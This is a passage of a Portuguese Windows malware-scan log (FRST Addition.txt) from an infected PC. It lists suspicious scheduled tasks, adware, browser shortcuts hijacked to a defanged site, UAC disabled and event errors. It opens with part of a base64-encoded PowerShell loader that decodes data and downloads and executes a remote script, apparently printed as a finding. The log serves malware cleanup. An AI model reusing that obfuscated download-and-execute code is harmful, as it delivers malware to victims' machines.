gBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {F2CB8D31-6B82-4FED-AD98-61246387AC1C} - \ToolsUpdatePlatform_ScheduledTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {F9D6E224-6F14-48C7-A9B5-767AFFEC6F71} - System32\Tasks\Advanced System~Protector_startup => C:\Program Files\ASP\AdvancedSystemProtector.exe [2015-11-20] () <==== ATENÇÃO
Task: {F9E3B046-66DF-4090-B732-1529CCA4B027} - \Winsta Update -> Nenhum Arquivo <==== ATENÇÃO
Task: {FD7038A1-5799-4640-A4F2-CCF297858221} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {FEC07962-18F6-451F-8F75-ED8CD3C24D60} - System32\Tasks\System HealerPeriod => C:\Program Files\SystemHealer\SystemHealer.exe [2015-12-29] ()
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\A9C13285-6187-4191-BB56-1B491E1E1AE0.job => C:\Users\vivo\AppData\Local\A9C13285-6187-4191-BB56-1B491E1E1AE0\A9C13285-6187-4191-BB56-1B491E1E1AE0.exe <==== ATENÇÃO
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\dsmonitor.job => C:\Program Files\Uniblue\DriverScanner\dsmonitor.exe
Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files\SystemHealer\SystemHealer.exe
Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files\SystemHealer\SystemHealer.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\vivo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox (2).lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\Users\vivo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
==================== Módulos Carregados (Whitelisted) ==============
2015-12-30 15:08 - 2015-12-30 15:08 - 02771896 _____ () C:\ProgramData\System32\SafeGuard32.dll
2012-09-29 11:24 - 2012-09-29 13:24 - 00167936 _____ () C:\Windows\System32\HPM1210LM.DLL
2014-01-10 08:10 - 2012-12-04 20:33 - 00059904 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP2030PP.DLL
2013-08-17 11:57 - 2012-09-29 13:24 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HPM1210PP.dll
2016-01-17 17:32 - 2016-01-17 17:32 - 00157184 _____ () C:\ProgramData\Ancropafe\1.0.7.1\erwrolnu.exe
2016-01-17 14:09 - 2015-11-20 16:13 - 06513616 _____ () C:\Program Files\ASP\AdvancedSystemProtector.exe
2016-01-17 14:09 - 2015-03-17 10:59 - 00886272 _____ () C:\Program Files\ASP\System.Data.SQLite.dll
2016-01-17 14:09 - 2015-11-20 16:13 - 01730512 _____ () C:\Program Files\ASP\aspsys.dll
2016-01-17 14:09 - 2015-03-17 10:59 - 00168448 _____ () C:\Program Files\ASP\UNRAR.DLL
2015-12-29 10:24 - 2015-12-29 10:24 - 02484728 _____ () C:\Program Files\SystemHealer\SystemHealer.exe
2015-12-10 06:15 - 2015-12-10 06:15 - 00139912 _____ () C:\Program Files\CalendarTool\2.0.0.11153\CalendarEntry.dll
2016-01-16 21:22 - 2016-01-16 18:42 - 01905664 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2015-10-19 18:00 - 2015-10-19 18:00 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1046.dll
2009-10-15 12:13 - 2009-10-15 12:13 - 00061440 _____ () C:\Program Files\HP\HPLaserJetService\HPTools.dll
2009-10-15 12:13 - 2009-10-15 12:13 - 00964096 _____ () C:\Program Files\HP\HPLaserJetService\LEDMXMLObjects.dll
2013-08-17 11:49 - 2012-11-08 01:00 - 00081920 _____ () C:\Windows\system32\mvusbews.DLL
2016-01-13 03:16 - 2016-01-13 03:16 - 02314752 _____ () C:\Program Files\WajaNetEn\bde72a8dc6eba2c602b262b1c7a1da23.exe
2016-01-15 08:23 - 2015-12-08 10:24 - 07142328 _____ () C:\Users\vivo\AppData\Roaming\XBox\XBLive.exe
2016-01-15 08:23 - 2015-11-30 10:08 - 00256440 _____ () C:\Users\vivo\AppData\Roaming\XBox\Xbox.Live.dll
2014-11-03 10:15 - 2014-11-03 10:15 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\3d576cbc4ffc5ad06fd61510c5d8f326\IsdiInterop.ni.dll
2011-02-08 10:28 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2016-01-13 03:16 - 2016-01-13 03:16 - 02314752 _____ () c:\program files\wajaneten\bde72a8dc6eba2c602b262b1c7a1da23.exe
2016-01-19 08:12 - 2016-01-19 08:12 - 11752448 _____ () c:\program files\wajaneten\WajaNetEnlibs\hncxya.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00153224 _____ () C:\Program Files\CalendarTool\2.0.0.11153\CalendarServ.exe
2015-12-10 06:16 - 2015-12-10 06:16 - 00543368 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPTask.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00406664 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPNet.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00428680 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPDR.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00747144 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPKernel.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00327304 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPHelp.dll
2015-12-10 06:15 - 2015-12-10 06:15 - 02259592 _____ () C:\Program Files\CalendarTool\2.0.0.11153\Calendar.exe
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\Program Files\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Windows\System32:22AD3627_Bb.gbp
AlternateDataStreams: C:\Windows\System32:22AD3627_Uni.gbp
AlternateDataStreams: C:\Windows\System32:4D9EB84B_Bb.gbp
AlternateDataStreams: C:\Windows\system32\drivers:GbpKmAp.lst
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Neilpe => ""="service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\bb.com.br -> hxxps://seg.bb.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\google.com -> www.google.com
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\google.com.br -> www.google.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.b.br -> www.itau.b.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.com.br -> bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.com.br -> hxxps://bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itaupersonnalite.com.br -> www.itaupersonnalite.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itaupersonnalite.com.br -> hxxp://www.itaupersonnalite.com.br
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:04 - 2015-11-24 09:39 - 00000822 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-2498198735-273976222-1782081069-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\vivo\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 189.39.152.35 - 189.39.152.45
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
MSCONFIG\startupreg: - => C:\ProgramData\msiql.exe /RUNNING
MSCONFIG\startupreg: AvastUI.exe => "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
MSCONFIG\startupreg: GfxServiceInstall => C:\Windows\system32\GfxCUIServiceInstall.vbs
MSCONFIG\startupreg: gmsd_br_004010210 => "C:\Program Files\gmsd_br_004010210\gmsd_br_004010210.exe"
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: HomePageHelper => C:\ProgramData\HomePage.exe
MSCONFIG\startupreg: IAStorIcon => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: LightGate => C:\ProgramData\LightGate.exe
MSCONFIG\startupreg: osmsg => C:\ProgramData\WindowsMsg\osmsg.exe /RUNNING
MSCONFIG\startupreg: PDFPrint => "C:\Program Files\PDF24\pdf24.exe"
MSCONFIG\startupreg: taskhost => rundll32.exe C:\ProgramData\WindowsMsg\E65602AFF61208B55B30B58739BDA171.dll Start /RUNNING
MSCONFIG\startupreg: unpkcs1132 => C:\Program Files\Common Files\unpkcs11buf\BRZPKCS32.exe -install
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{C30CE751-E94C-43EA-8465-B8AD72BD72B4}C:\program files\spyware terminator\spywareterminatorupdate.exe] => (Allow) C:\program files\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{B0D6B68B-20BA-44CD-8EC7-817713486F13}C:\program files\spyware terminator\spywareterminatorupdate.exe] => (Allow) C:\program files\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{7B8990A5-AC0B-4021-B703-2EA68FFA33EC}] => (Allow) C:\Program Files\mystarttb\ToolbarCleaner.exe
FirewallRules: [{25FCB9C0-EB6A-4134-904C-E21FA6109A26}] => (Allow) C:\Program Files\mystarttb\ToolbarCleaner.exe
FirewallRules: [TCP Query User{5378BD83-22D9-459B-8704-215436873EA9}C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe] => (Allow) C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe
FirewallRules: [UDP Query User{A74AF7FD-ACDE-4B0F-AC14-FAE1A4FDB585}C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe] => (Allow) C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe
==================== Pontos de Restauração =========================
ATENÇÃO: A Restauração do Sistema está desabilitada
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Teredo Tunneling Pseudo-Interface
Description: Adaptador de Túnel Teredo da Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: SafeNet Inc. USB Key
Description: SafeNet Inc. USB Key
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: SafeNet Inc.
Service: aksusb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (01/19/2016 08:24:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompatTelRunner.exe, versão: 10.0.11065.1000, carimbo de hora: 0x5646dba1
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6f6d42c3
Identificação do processo com falha: 0xaa8
Hora de início do aplicativo com falha: 0xCompatTelRunner.exe0
Caminho do aplicativo com falha: CompatTelRunner.exe1
FCaminho do módulo de falhas: CompatTelRunner.exe2
Identificação do Relatório: CompatTelRunner.exe3
Error: (01/19/2016 08:24:05 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: 80004005
Error: (01/18/2016 03:40:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: WerFault.exe, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc2d9
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6f8942c3
Identificação do processo com falha: 0x350
Hora de início do aplicativo com falha: 0xWerFault.exe0
Caminho do aplicativo com falha: WerFault.exe1
FCaminho do módulo de falhas: WerFault.exe2
Identificação do Relatório: WerFault.exe3
Error: (01/18/2016 03:39:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: osmsg.exe, versão: 1.0.0.29, carimbo de hora: 0x569a1e94
Nome do módulo de falhas: osmsg.exe, versão: 1.0.0.29, carimbo de hora: 0x569a1e94
Código de exceção: 0xc0000005
Deslocamento com falha: 0x0000e9d2
Identificação do processo com falha: 0x172c
Hora de início do aplicativo com falha: 0xosmsg.exe0
Caminho do aplicativo com falha: osmsg.exe1
FCaminho do módulo de falhas: osmsg.exe2
Identificação do Relatório: osmsg.exe3
Error: (01/18/2016 03:29:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SpywareTerminatorUpdate.exe, versão: 3.0.1.108, carimbo de hora: 0x565d533c
Nome do módulo de falhas: TorrentDll.dll, versão: 3.0.0.1, carimbo de hora: 0x4dbe5f67
Código de exceção: 0xc0000417
Deslocamento com falha: 0x00132780
Identificação do processo com falha: 0x760
Hora de início do aplicativo com falha: 0xSpywareTerminatorUpdate.exe0
Caminho do aplicativo com falha: SpywareTerminatorUpdate.exe1
FCaminho do módulo de falhas: SpywareTerminatorUpdate.exe2
Identificação do Relatório: SpywareTerminatorUpdate.exe3
Error: (01/18/2016 09:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: winlogon.exe, versão: 6.1.7601.18540, carimbo de hora: 0x53c71d03
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.19110, carimbo de hora: 0x5684255a
Código de exceção: 0xc0000005
Deslocamento com falha: 0x00065689
Identificação do processo com falha: 0x270
Hora de início do aplicativo com falha: 0xwinlogon.exe0
Caminho do aplicativo com falha: winlogon.exe1
FCaminho do módulo de falhas: winlogon.exe2
Identificação do Relatório: winlogon.exe3
Error: (01/18/2016 08:40:32 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: 80004005
Error: (01/18/2016 08:38:47 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompatTelRunner.exe, versão: 10.0.11065.1000, carimbo de hora: 0x5646dba1
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6fd542c3
Identificação do processo com falha: 0x8a0
Hora de início do aplicativo com falha: 0xCompatTelRunner.exe0
Caminho do aplicativo com falha: CompatTelRunner.exe1
FCaminho do módulo de falhas: CompatTelRunner.exe2
Identificação do Relatório: CompatTelRunner.exe3
Error: (01/17/2016 09:09:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SpywareTerminatorUpdate.exe, versão: 3.0.1.108, carimbo de hora: 0x565d533c
Nome do módulo de falhas: TorrentDll.dll, versão: 3.0.0.1, carimbo de hora: 0x4dbe5f67
Código de exceção: 0xc0000417
Deslocamento com falha: 0x00132780
Identificação do processo com falha: 0x101c
Hora de início do aplicativo com falha: 0xSpywareTerminatorUpdate.exe0
Caminho do aplicativo com falha: SpywareTerminatorUpdate.exe1
FCaminho do módulo de falhas: SpywareTerminatorUpdate.exe2
Identificação do Relatório: SpywareTerminatorUpdate.exe3
Error: (01/17/2016 05:36:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: myoffergroup_br4.tmp, versão: 51.52.0.0, carimbo de hora: 0x2a425e19
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x705842c3
Identificação do processo com falha: 0xc34
Hora de início do aplicativo com falha: 0xmyoffergroup_br4.tmp0
Caminho do aplicativo com falha: myoffergroup_br4.tmp1
FCaminho do módulo de falhas: myoffergroup_br4.tmp2
Identificação do Relatório: myoffergroup_br4.tmp3
Erros de Sistema:
=============
Error: (01/19/2016 08:15:05 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço MPC Core Protect Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (01/19/2016 08:12:57 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
UGProtect
Error: (01/19/2016 08:12:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Windows Security devido ao seguinte erro:
%%2
Error: (01/19/2016 08:12:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço HASP License Manager devido ao seguinte erro:
%%1053
Error: (01/19/2016 08:12:37 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço HASP License Manager.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Arquivos Offline terminou com o erro:
%%3
Error: (01/19/2016 08:11:59 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento anterior do sistema em 18:02:08 às 18/01/2016 não era esperado.
CodeIntegrity:
===================================
Date: 2015-10-29 23:00:22.974
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2015-10-29 23:00:21.669
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2015-10-29 23:00:19.697
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Informações da Memória ===========================
Processador: Intel(R) Atom(TM) CPU N2600 @ 1.60GHz
Percentagem de memória em uso: 82%
RAM física total: 2008.86 MB
RAM física disponível: 347.25 MB
Virtual Total: 4016.86 MB
Virtual disponível: 1190.3 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:298.09 GB) (Free:60.51 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive d: (XP2012) (CDROM) (Total:0.52 GB) (Free:0 GB) CDFS
Drive f: () (Removable) (Total:7.44 GB) (Free:7.42 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Fim de Addition.txt ============================